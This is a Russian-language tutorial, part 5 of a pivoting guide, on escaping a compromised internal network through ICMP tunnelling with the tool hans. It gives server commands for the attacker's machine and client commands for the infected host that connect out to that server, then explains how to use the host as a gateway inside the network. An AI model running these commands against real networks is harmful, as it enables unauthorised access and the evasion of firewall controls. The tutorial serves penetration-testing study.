Руководство по pivoting. Часть 5
Выход из внутренней сети
Теперь другой случай. Скажем, ваша социальная инженерия в конечном итоге позволила вам получить размещение во внутренней сети. У вас есть ограниченное подключение и возможность выполнения команды на зараженном компьютере. Конечно, если Интернет напрямую маршрутизируется и не используются брандмауэры, то можете прибегнуть к любой методики, описанной выше. Но если вам не так повезло, то все еще есть способы проложить свой путь.
ICMP-туннелирования
Если разрешен ICMP-трафик до внешних сетей, то, скорее всего, вы можете установить icmp-туннель. Недостатком является то, что вам нужны привилегии root/administrator на целевой системе, потому необходимо использовать raw-сокеты. Проверьте этот инструмент — code.gerade.org/hans/. Лично автор никогда не пытался запустить его на Windows. Он работает как charm на Linux. Команда на стороне сервера (машина атакующего):
./hans -v -f -s 1.1.1.1 -p P@ssw0rd
Флаг -v для многословия, флаг -f, чтобы работать на переднем плане и значение флага -s является указанием IP сервера на новом tun-интерфейсе.
Сторона клиента:
./hans -f -c <server_ip> -p P@ssw0rd –v
После успешного подключения клиент должен быть видимый непосредственно на 1.1.1.100:
# ping 1.1.1.100
PING 1.1.1.100 (1.1.1.100) 56(84) bytes of data.
64 bytes from 1.1.1.100: icmp_seq=1 ttl=65 time=42.9 ms
Теперь можете использовать эту машину как шлюз во внутреннюю сеть. Используйте данный шлюз машины по умолчанию или подключитесь к интерфейсу управления (ssh/tsh/веб-оболочка).